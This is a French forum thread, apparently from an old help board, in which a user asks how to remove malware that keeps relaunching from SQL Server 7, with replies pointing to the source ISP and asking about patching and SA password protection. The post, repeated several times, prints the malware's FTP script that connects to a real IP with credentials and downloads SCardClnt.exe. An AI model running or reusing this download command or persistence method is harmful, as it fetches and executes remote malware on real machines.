J'ai récupéré un virus qui se relance automatiquement à partir de SQL
server. (j'ai SQL server 7 sur ma machine).
Un process (en fait plusieurs) est créé dans le serveur SQL server qui
relance un fichier commandes DOS
dont voici un contenu (car il y en a plusieurs) à l'aide de xl_execcmd
open 82.212.179.3 22541
user onxtfc onxtfc
get SCardClnt.exe
quit
car la commande lance "FTP.exe".
Comme j'ai tout enlevé, il ne se passe plus grand chose, sauf que des
process CMD et FTP tournent dans ma machine (sans rien faire, tout étant
bloqué).
J'ai supprimé les process sous SQL Server, mais ils reviennent quand même.
J'ai arrété SQL server et c'est sûr, maintenant ils sont bloqué.
Comment se débarrasser définitivement de cette saloperie, si quelqu'un l'a
déjà eu. C'est à dire où se trouve le truc qui recrée les process SQL
server, sachant que j'ai viré la base Pubs (car dans cette base, il y avait
des procédures stockées pas catholiques).
merci
(sinon je déinstalle SQL serveur et je le réinstalle, mais c'est pas garanti
...)
Cette action est irreversible, confirmez la suppression du commentaire ?
Signaler le commentaire
Veuillez sélectionner un problème
Nudité
Violence
Harcèlement
Fraude
Vente illégale
Discours haineux
Terrorisme
Autre
Ph. B.
Thierry Bertrand a écrit:
Bonjour,
J'ai récupéré un virus qui se relance automatiquement à partir de SQL server. (j'ai SQL server 7 sur ma machine). Un process (en fait plusieurs) est créé dans le serveur SQL server qui relance un fichier commandes DOS dont voici un contenu (car il y en a plusieurs) à l'aide de xl_execcmd
open 82.212.179.3 22541 user onxtfc onxtfc get SCardClnt.exe quit
car la commande lance "FTP.exe".
Comme j'ai tout enlevé, il ne se passe plus grand chose, sauf que des process CMD et FTP tournent dans ma machine (sans rien faire, tout étant bloqué).
J'ai supprimé les process sous SQL Server, mais ils reviennent quand même. J'ai arrété SQL server et c'est sûr, maintenant ils sont bloqué.
Comment se débarrasser définitivement de cette saloperie, si quelqu'un l'a déjà eu. C'est à dire où se trouve le truc qui recrée les process SQL server, sachant que j'ai viré la base Pubs (car dans cette base, il y avait des procédures stockées pas catholiques).
merci
(sinon je déinstalle SQL serveur et je le réinstalle, mais c'est pas garanti ...)
C'est récupéré chez cet abonné: 82-212-179-3.teledisnet.be voir avec le FAI-Cable...
MsSQl est-il patché ? les accès SA sont-ils protégés ? L'OS serveur n'est-il pas lui même compromis ?
Thierry Bertrand a écrit:
Bonjour,
J'ai récupéré un virus qui se relance automatiquement à partir de SQL
server. (j'ai SQL server 7 sur ma machine).
Un process (en fait plusieurs) est créé dans le serveur SQL server qui
relance un fichier commandes DOS
dont voici un contenu (car il y en a plusieurs) à l'aide de xl_execcmd
open 82.212.179.3 22541
user onxtfc onxtfc
get SCardClnt.exe
quit
car la commande lance "FTP.exe".
Comme j'ai tout enlevé, il ne se passe plus grand chose, sauf que des
process CMD et FTP tournent dans ma machine (sans rien faire, tout étant
bloqué).
J'ai supprimé les process sous SQL Server, mais ils reviennent quand même.
J'ai arrété SQL server et c'est sûr, maintenant ils sont bloqué.
Comment se débarrasser définitivement de cette saloperie, si quelqu'un l'a
déjà eu. C'est à dire où se trouve le truc qui recrée les process SQL
server, sachant que j'ai viré la base Pubs (car dans cette base, il y avait
des procédures stockées pas catholiques).
merci
(sinon je déinstalle SQL serveur et je le réinstalle, mais c'est pas garanti
...)
J'ai récupéré un virus qui se relance automatiquement à partir de SQL server. (j'ai SQL server 7 sur ma machine). Un process (en fait plusieurs) est créé dans le serveur SQL server qui relance un fichier commandes DOS dont voici un contenu (car il y en a plusieurs) à l'aide de xl_execcmd
open 82.212.179.3 22541 user onxtfc onxtfc get SCardClnt.exe quit
car la commande lance "FTP.exe".
Comme j'ai tout enlevé, il ne se passe plus grand chose, sauf que des process CMD et FTP tournent dans ma machine (sans rien faire, tout étant bloqué).
J'ai supprimé les process sous SQL Server, mais ils reviennent quand même. J'ai arrété SQL server et c'est sûr, maintenant ils sont bloqué.
Comment se débarrasser définitivement de cette saloperie, si quelqu'un l'a déjà eu. C'est à dire où se trouve le truc qui recrée les process SQL server, sachant que j'ai viré la base Pubs (car dans cette base, il y avait des procédures stockées pas catholiques).
merci
(sinon je déinstalle SQL serveur et je le réinstalle, mais c'est pas garanti ...)
